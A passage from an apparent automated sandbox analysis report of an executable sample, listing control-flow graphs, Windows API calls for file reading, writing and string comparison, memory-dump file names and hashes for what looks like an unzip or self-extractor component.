                                        • CloseHandle.KERNEL32(00000000), ref: 0040F96E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ErrorFileLast$AttributesCloseCreateHandleTime
                                        • String ID: CreateFile() error %d when trying set file time$SetFileTime failed: %d$warning (%d): could not set file attributes$ compressed WinNT security data missing (%d bytes)%s$%-22s $nircmdc.exe
                                        • API String ID: 1520554102-3763623673
                                        • Opcode ID: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                        • Instruction ID: ec123f940c35398d6c20d288b992aaa82a19b0590d8110fdc60b447adca6d815
                                        • Opcode Fuzzy Hash: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                        • Instruction Fuzzy Hash: 1C51B671B402117BE720AB28BC47FB77359EB54B14F94453AF814E22C2F6B8AC18826D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 354 41ab18-41ab49 355 41ab8b-41ab90 354->355 356 41ab4b-41ab5e CompareStringW 354->356 359 41aba2-41aba5 355->359 360 41ab92-41ab9f call 4193b3 355->360 357 41ab60-41ab66 356->357 358 41ab68-41ab7b CompareStringA 356->358 357->355 361 41ad81 358->361 362 41ab81 358->362 364 41abb7-41abbf 359->364 365 41aba7-41abb4 call 4193b3 359->365 360->359 366 41ad83-41ad94 361->366 362->355 369 41abc1-41abd7 CompareStringA 364->369 370 41abdc-41abde 364->370 365->364 369->366 370->361 372 41abe4-41abe7 370->372 373 41abf1-41abf3 372->373 374 41abe9-41abee 372->374 375 41abf5-41abf8 373->375 376 41abfe-41ac01 373->376 374->373 375->376 377 41ac96-41acac MultiByteToWideChar 375->377 378 41ac03 376->378 379 41ac0b-41ac0e 376->379 377->361 383 41acb2-41ace8 call 41b280 377->383 380 41ac05-41ac06 378->380 381 41ac10-41ac12 379->381 382 41ac17-41ac19 379->382 380->366 381->366 384 41ac1b-41ac2a GetCPInfo 382->384 385 41ac5c-41ac5e 382->385 383->361 392 41acee-41ad06 MultiByteToWideChar 383->392 384->361 387 41ac30-41ac32 384->387 385->380 389 41ac60-41ac63 387->389 390 41ac34-41ac38 387->390 389->377 393 41ac65-41ac69 389->393 390->385 394 41ac3a-41ac40 390->394 392->361 395 41ad08-41ad1e MultiByteToWideChar 392->395 393->381 396 41ac6b-41ac71 393->396 394->385 397 41ac42-41ac47 394->397 395->361 398 41ad20-41ad52 call 41b280 395->398 396->381 399 41ac73-41ac78 396->399 397->385 400 41ac49-41ac50 397->400 398->361 410 41ad54-41ad69 MultiByteToWideChar 398->410 399->381 402 41ac7a-41ac81 399->402 403 41ac52-41ac54 400->403 404 41ac56-41ac5a 400->404 406 41ac83-41ac85 402->406 407 41ac8b-41ac8f 402->407 403->378 403->404 404->385 404->397 406->378 406->407 407->399 409 41ac91 407->409 409->381 410->361 411 41ad6b-41ad7f CompareStringW 410->411 411->366
                                        APIs
                                        • CompareStringW.KERNELBASE(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,00573F6C,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041AB56
                                        • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,00000002,00428D60,0040114F), ref: 0041AB73
                                        • CompareStringA.KERNEL32(?,?,00000000,0040114F,00428D60,00000002,00000000,00573F6C,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041ABD1
                                        • GetCPInfo.KERNEL32(?,00000000,00000000,00573F6C,?,00000002,00428D60,004027DD,?,?,00000002,00428D60,0040114F), ref: 0041AC22
                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041ACA1
                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                        • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                        • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                        • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharCompareMultiStringWide$Info
                                        • String ID:
                                        • API String ID: 1651298574-0
                                        • Opcode ID: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                        • Instruction ID: 8982f73b66f23a33087e68d4939e0b6a76c79f8fa55c1b86de23fe76a65e9542
                                        • Opcode Fuzzy Hash: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                        • Instruction Fuzzy Hash: 06719F71A05289AFCF219F94DC859EF7FB6EB05314F14412BF950A2260D3398CA5CB9B

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 412 4101d0-4101f0 call 412a00 415 4101f2-410204 call 412a00 412->415 416 410206-41020b 412->416 415->416 419 41021f-410226 415->419 418 41020d-41020f 416->418 416->419 418->419 421 410211-410213 418->421 422 410228-41023a call 41338f 419->422 423 41023c-41024a 419->423 421->419 424 410215-41021e 421->424 426 41024f-410251 422->426 423->426 427 410253-410257 426->427 428 410259-410274 GetFullPathNameA 426->428 427->428 430 410285-41029b call 412a00 427->430 431 410276-41027d 428->431 432 41027e 428->432 435 4102a1-4102f6 call 4140c0 GetVolumeInformationA 430->435 436 41037d-410389 430->436 432->430 439 410305-410337 call 41c146 call 412a00 435->439 440 4102f8-410304 435->440 445 410373 439->445 446 410339-41034f call 412a00 439->446 445->436 446->445 449 410351-410371 call 412a00 446->449 449->436 449->445
                                        APIs
                                        • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0041026C
                                        • GetVolumeInformationA.KERNELBASE(C:/,?,00000104,?,?,?,?,00000104), ref: 004102EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: FullInformationNamePathVolume
                                        • String ID: C:/$FAT$HPFS$VFAT
                                        • API String ID: 1555998374-1151019397
                                        • Opcode ID: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                        • Instruction ID: fd030fab3a41d782d0bfb313d5ad92de2eb91019b62ba207a93a103eae62fd2d
                                        • Opcode Fuzzy Hash: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                        • Instruction Fuzzy Hash: CB4159B16803406AE720DB20EC4BFEB37945F94708F44442AFD9486282F6FCD9D9839E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 604 418ac8-418ade call 413274 607 418ae0-418ae7 call 414957 604->607 608 418ae8-418af8 604->608 607->608 610 418afe-418b00 608->610 612 418b02-418b1a 610->612 613 418b1c-418b2d GetStartupInfoA 610->613 612->610 614 418b33-418b39 613->614 615 418bf8 613->615 614->615 617 418b3f-418b4e 614->617 616 418bfa-418c06 615->616 618 418c55 616->618 619 418c08-418c0e 616->619 620 418b50 617->620 621 418b52-418b58 617->621 624 418c59-418c5d 618->624 622 418c10-418c13 619->622 623 418c15-418c1c 619->623 620->621 625 418b5a 621->625 626 418bac-418bb0 621->626 627 418c1f-418c2b GetStdHandle 622->627 623->627 624->616 629 418c5f-418c72 SetHandleCount 624->629 630 418b5f-418b6c call 413274 625->630 626->615 628 418bb2-418bb7 626->628 632 418c44-418c48 627->632 633 418c2d-418c36 GetFileType 627->633 634 418bb9-418bbf 628->634 635 418bef-418bf6 628->635 639 418ba6 630->639 640 418b6e-418b77 630->640 632->624 633->632 637 418c38-418c42 633->637 634->635 638 418bc1-418bc4 634->638 635->615 635->628 637->632 641 418c4a-418c4d 637->641 642 418bd1-418bec 638->642 643 418bc6-418bcf GetFileType 638->643 639->626 644 418b7d-418b7f 640->644 641->624 645 418c4f-418c53 641->645 642->635 643->635 643->642 646 418b81-418b97 644->646 647 418b99-418ba2 644->647 645->624 646->644 647->630 648 418ba4 647->648 648->626
                                        APIs
                                        • GetStartupInfoA.KERNEL32(?), ref: 00418B21
                                        • GetFileType.KERNEL32(00000800), ref: 00418BC7
                                        • GetStdHandle.KERNEL32(-000000F6), ref: 00418C20
                                        • GetFileType.KERNELBASE(00000000), ref: 00418C2E
                                        • SetHandleCount.KERNEL32 ref: 00418C65
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: FileHandleType$CountInfoStartup
                                        • String ID:
                                        • API String ID: 1710529072-0
                                        • Opcode ID: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                        • Instruction ID: 9f710145433f53a11f67beba66e492aa2ca87e5ae07b95c08d009534c858da6a
                                        • Opcode Fuzzy Hash: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                        • Instruction Fuzzy Hash: 7F5115B16082518BD7208F28CC447D67BA0AB12325F19866EF4A6CB3E1DB78E8C5C75D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 662 413847-413851 663 413853-41385e GetCurrentProcess TerminateProcess 662->663 664 413864-41387a 662->664 663->664 665 4138b8-4138cc call 4138e0 664->665 666 41387c-413883 664->666 675 4138de-4138df 665->675 676 4138ce-4138d8 ExitProcess 665->676 668 413885-413891 666->668 669 4138a7-4138b7 call 4138e0 666->669 672 413893-413897 668->672 673 4138a6 668->673 669->665 677 413899 672->677 678 41389b-4138a4 672->678 673->669 677->678 678->672 678->673
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00406A5A,error: zipfile read error,00413832,00000000,00000000,00000000,00406A5A,00000003,?,?,?,?,?,?,0040519A), ref: 00413857
                                        • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,0040519A,?,?,?,?,?,?,?,?), ref: 0041385E
                                        • ExitProcess.KERNEL32 ref: 004138D8
                                        Strings
                                        • error: zipfile read error, xrefs: 00413847
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID: error: zipfile read error
                                        • API String ID: 1703294689-3207815817
                                        • Opcode ID: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                        • Instruction ID: 9a9e4aaeeafff871062add6e916ef3ed514e9f96ede6102045d5c26cbba63ca5
                                        • Opcode Fuzzy Hash: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                        • Instruction Fuzzy Hash: AB01C431704310ABD6206F1AFC45A9ABBD5EB84315B50443FF444A22A0DBB959C5DB9E

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,00573F70), ref: 0040F6BA
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,00000000,0000AE00,?,?,000F8000,0040519A), ref: 0040F703
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: FilePointerVersion
                                        • String ID: 'h@
                                        • API String ID: 2103187656-431696200
                                        • Opcode ID: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                        • Instruction ID: 4378285b618a777efcf84251ec6a8b6b99a83c3f06562969f79921aa5accdbfc
                                        • Opcode Fuzzy Hash: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                        • Instruction Fuzzy Hash: F1F0B43278421076E530A67DBC05FEF23488FD1774F100636F510EA1D0DA38988711AD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 679 41b7f2-41b80d 680 41b818-41b81c 679->680 681 41b80f-41b816 679->681 682 41b823-41b82a 680->682 681->682 683 41b83d-41b846 682->683 684 41b82c-41b82f 682->684 687 41b875 683->687 688 41b848-41b849 683->688 685 41b831-41b837 684->685 686 41b839 684->686 685->683 685->686 686->683 691 41b87c-41b882 687->691 689 41b84b-41b84c 688->689 690 41b86c-41b873 688->690 692 41b863-41b86a 689->692 693 41b84e-41b85e 689->693 690->691 694 41b884-41b887 691->694 695 41b8aa 691->695 692->691 699 41ba88-41ba8b 693->699 696 41b8a1-41b8a8 694->696 697 41b889-41b88c 694->697 698 41b8ad-41b8c0 695->698 696->698 700 41b898-41b89f 697->700 701 41b88e-41b891 697->701 702 41b8c2 698->702 703 41b8f7-41b8fd 698->703 704 41baa6-41baaa 699->704 700->698 701->693 707 41b893-41b896 701->707 708 41b8f2-41b8f5 702->708 709 41b8c4-41b8c6 702->709 705 41b919 703->705 706 41b8ff-41b905 703->706 712 41b920-41b92a 705->712 710 41b910-41b917 706->710 711 41b907-41b909 706->711 707->698 708->712 709->708 713 41b8c8-41b8ca 709->713 710->712 711->705 714 41b90b 711->714 715 41b92c-41b93a 712->715 716 41b93f-41b941 712->716 717 41b8e9-41b8f0 713->717 718 41b8cc-41b8d2 713->718 714->693 715->716 719 41b93c-41b93e 715->719 720 41b943-41b949 716->720 721 41b94d-41b950 716->721 717->712 718->710 722 41b8d4-41b8da 718->722 719->716 720->721 723 41b952 721->723 724 41b954-41b956 721->724 722->693 725 41b8e0-41b8e7 722->725 723->724 726 41b960-41b962 724->726 727 41b958-41b95e 724->727 725->712 728 41b96a-41b976 call 414317 726->728 729 41b964 726->729 727->728 732 41b978-41b989 728->732 733 41b98b-41b9a8 CreateFileA 728->733 729->728 734 41b9c9-41b9cb 732->734 735 41b9aa-41b9b3 GetFileType 733->735 736 41b9bc-41b9c8 GetLastError call 419c07 733->736 734->704 737 41b9d0-41b9d3 735->737 738 41b9b5-41b9b6 CloseHandle 735->738 736->734 741 41b9d5-41b9d9 737->741 742 41b9db-41b9de 737->742 738->736 743 41b9e4-41ba13 call 4143ac 741->743 742->743 744 41b9e0 742->744 747 41ba15-41ba17 743->747 748 41ba8d-41ba91 743->748 744->743 747->748 749 41ba19-41ba1d 747->749 750 41ba93-41ba97 748->750 751 41baa4 748->751 749->748 752 41ba1f-41ba32 call 41908b 749->752 750->751 753 41ba99-41baa0 750->753 751->704 756 41ba42-41ba57 call 41b5e5 752->756 757 41ba34-41ba3e 752->757 753->751 763 41ba59-41ba5d 756->763 764 41ba6f-41ba7f call 41908b 756->764 757->748 758 41ba40 757->758 760 41ba81-41ba87 call 419c6e 758->760 760->699 763->764 767 41ba5f-41ba6d call 41be65 763->767 764->748 764->760 767->760 767->764
                                        APIs
                                        • CreateFileA.KERNELBASE(00000001,80000000,00406700,0000000C,00000001,00000080,00000000,00000000,00000000,00000000), ref: 0041B99E
                                        • GetFileType.KERNELBASE(00000000), ref: 0041B9AB
                                        • CloseHandle.KERNEL32(00000000), ref: 0041B9B6
                                        • GetLastError.KERNEL32 ref: 0041B9BC
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastType
                                        • String ID:
                                        • API String ID: 1809617866-0
                                        • Opcode ID: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                        • Instruction ID: 0ae395d7474f1af9b9c6e449919d5970c2ed78d5f3119fdd6490fe40e80d97b9
                                        • Opcode Fuzzy Hash: 9034867e0e5f656806f9e8757dd3215358153a44656e4880629306d682652c13
                                        • Instruction Fuzzy Hash: B8811271D1420896EF209F68C8847EF7B64EF01768F28421FE951A63D1C7BC89C687CA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 771 41b5e5-41b5f7 772 41b7c2-41b7c9 771->772 773 41b5fd-41b61e 771->773 774 41b7d3 772->774 773->772 775 41b624-41b631 773->775 776 41b7d6-41b7da 774->776 777 41b633-41b636 775->777 778 41b69a-41b69c 775->778 777->778 779 41b638-41b63b 777->779 778->776 780 41b65a-41b671 ReadFile 779->780 781 41b63d-41b642 779->781 783 41b673-41b67e GetLastError 780->783 784 41b6ad-41b6bf 780->784 781->780 782 41b644-41b655 781->782 782->780 787 41b680-41b690 783->787 788 41b695-41b698 783->788 785 41b6c5-41b6c7 784->785 786 41b7bd-41b7c0 784->786 790 41b6d2 785->790 791 41b6c9-41b6cc 785->791 786->776 787->774 788->778 789 41b6a1-41b6a8 call 419c07 788->789 789->774 794 41b6d4-41b6e6 790->794 791->790 793 41b6ce-41b6d0 791->793 793->794 796 41b7b7-41b7ba 794->796 797 41b6ec-41b6f3 794->797 796->786 798 41b7a7-41b7b1 797->798 799 41b6f9-41b6fb 797->799 798->796 800 41b7b3-41b7b5 798->800 801 41b708-41b70c 799->801 802 41b6fd-41b703 799->802 800->796 804 41b726-41b742 ReadFile 801->804 805 41b70e-41b715 801->805 803 41b799-41b79f 802->803 803->797 808 41b7a5 803->808 809 41b744-41b74c GetLastError 804->809 810 41b74e-41b752 804->810 806 41b717-41b71b 805->806 807 41b71d-41b724 805->807 811 41b77b-41b77e 806->811 807->803 808->796 809->810 812 41b795 809->812 810->812 813 41b754-41b75b 810->813 816 41b798 811->816 812->816 814 41b770-41b773 813->814 815 41b75d-41b762 813->815 818 41b780-41b793 call 41908b 814->818 819 41b775-41b779 814->819 815->811 817 41b764-41b76e 815->817 816->803 817->803 818->803 818->812 819->811 819->818
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 0041B669
                                        • GetLastError.KERNEL32 ref: 0041B673
                                        • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 0041B73A
                                        • GetLastError.KERNEL32 ref: 0041B744
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastRead
                                        • String ID:
                                        • API String ID: 1948546556-0
                                        • Opcode ID: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                        • Instruction ID: 5320c27688b98f5302928a735e1011bfd1bbdf3e9bbdda589cca2c7182946b54
                                        • Opcode Fuzzy Hash: 662fd1020942aae6793e2087e8affa122bfdd206edd3d2d1eb422e75de9f09a4
                                        • Instruction Fuzzy Hash: 5461D434604385DFDF218F58C884BEA7BB1EF66314F14409BE8618B391D37899C6CB9A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 822 411df0-411e0a call 41c29c 825 411e10-411e3a call 40fdc0 CreateFileA 822->825 826 411f48-411f54 GetFileAttributesA 822->826 832 411e40-411e61 GetFileTime CloseHandle 825->832 833 411f3e-411f47 825->833 827 411f94-411f9d 826->827 828 411f56-411f59 826->828 828->827 831 411f5b-411f93 call 407730 828->831 832->833 835 411e67-411e72 832->835 837 411e74-411e82 call 411fa0 835->837 838 411ede-411eec call 412020 835->838 845 411e93-411ea1 call 411fa0 837->845 846 411e84-411e8a 837->846 843 411efd-411f0b call 412020 838->843 844 411eee-411ef4 838->844 851 411f0e-411f14 843->851 844->843 847 411ef6-411efb 844->847 853 411ea4-411eaa 845->853 846->845 849 411e8c-411e91 846->849 847->851 849->853 855 411f16-411f1c 851->855 856 411f2d-411f3b call 412020 851->856 857 411ec3-411edd call 411fa0 853->857 858 411eac-411eb2 853->858 855->856 859 411f1e-411f2c 855->859 856->833 858->857 861 411eb4-411ec2 858->861
                                        APIs
                                        • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000001,?,?,?,004119DD,00000000,00439BA4), ref: 00411E2F
                                        • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E50
                                        • CloseHandle.KERNEL32(00000000,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411E59
                                          • Part of subcall function 00412020: FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0041202E
                                          • Part of subcall function 00412020: FileTimeToSystemTime.KERNEL32(?,?), ref: 00412050
                                        • GetFileAttributesA.KERNELBASE(?,00000000,00000001,?,?,?,004119DD,00000000,00439BA4,00000000), ref: 00411F49
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: File$Time$AttributesCloseCreateHandleLocalSystem
                                        • String ID:
                                        • API String ID: 3576422975-0
                                        • Opcode ID: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                        • Instruction ID: 9a36ea26c0d62d6c96e4ebb2062f951fe69ccc09c33042294df6f6886f757777
                                        • Opcode Fuzzy Hash: 3cad0420f0cdd6335c139d48f8f330720120e89d336076a35baf0621a384d64a
                                        • Instruction Fuzzy Hash: 5751C3316043015BD710DF6AEC81BEBB7E8EB94764F440A2EFE44C3261F369E54A87A5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 865 415612-415627 866 4157a6-4157ad 865->866 867 41562d-415649 865->867 869 4157b7 866->869 867->866 868 41564f-41565a 867->868 870 415663-415665 868->870 871 41565c-41565e 868->871 872 4157ba-4157be 869->872 873 415673-41567b 870->873 874 415667-415670 call 41908b 870->874 871->872 876 415681-41568d 873->876 877 415742-415757 WriteFile 873->877 874->873 881 415693 876->881 882 41577a-415781 876->882 879 415764-41576d GetLastError 877->879 880 415759-415762 877->880 883 41570b-415710 879->883 880->883 884 415699-4156a2 881->884 885 415783-415789 882->885 886 41578f-41579f 882->886 887 4157a1-4157a4 883->887 888 415716-415719 883->888 889 4156a4-4156af 884->889 890 4156cd-4156f2 WriteFile 884->890 885->871 885->886 886->869 887->872 888->882 893 41571b-415721 888->893 894 4156b1-4156b7 889->894 895 4156b8-4156cb 889->895 891 4156f4-4156fc 890->891 892 415737-415740 GetLastError 890->892 896 415709 891->896 897 4156fe-415707 891->897 892->896 898 415723-415732 893->898 899 41576f-415778 call 419c07 893->899 894->895 895->884 895->890 896->883 897->881 897->896 898->869 899->869
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,?,00000000,00000000,00000001,00000000,?), ref: 004156EA
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: ec952a0408a3cf418a3ec59ac1f76e10f98e980b2df25900257c814851cd74c4
                                        • Instruction ID: fd92a10f5c6077c0babe725d0f2bda95c351a5f2df5236355322924d052ad3e7
                                        • Opcode Fuzzy Hash: ec952a0408a3cf418a3ec59ac1f76e10f98e980b2df25900257c814851cd74c4
                                        • Instruction Fuzzy Hash: 9B51D431A00608EFCB11CF68C985BED7BB0BF95340F6481ABE825CB2D0D7349A81CB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 902 41908b-419098 903 41909a-4190b5 902->903 904 41910d-419114 902->904 903->904 906 4190b7-4190c1 call 41449d 903->906 905 41911e 904->905 908 419121-419124 905->908 910 4190c3-4190cd 906->910 911 4190cf-4190e5 SetFilePointer 906->911 910->905 912 4190e7-4190ed GetLastError 911->912 913 4190ef 911->913 914 4190f1-4190f3 912->914 913->914 915 4190f5-4190fc call 419c07 914->915 916 4190fe-41910b 914->916 915->905 916->908
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,pVA,00000000,00000000,00000000,00000000,?,00415670,00000000,00000000,00000002,00000001,00000000,?), ref: 004190DA
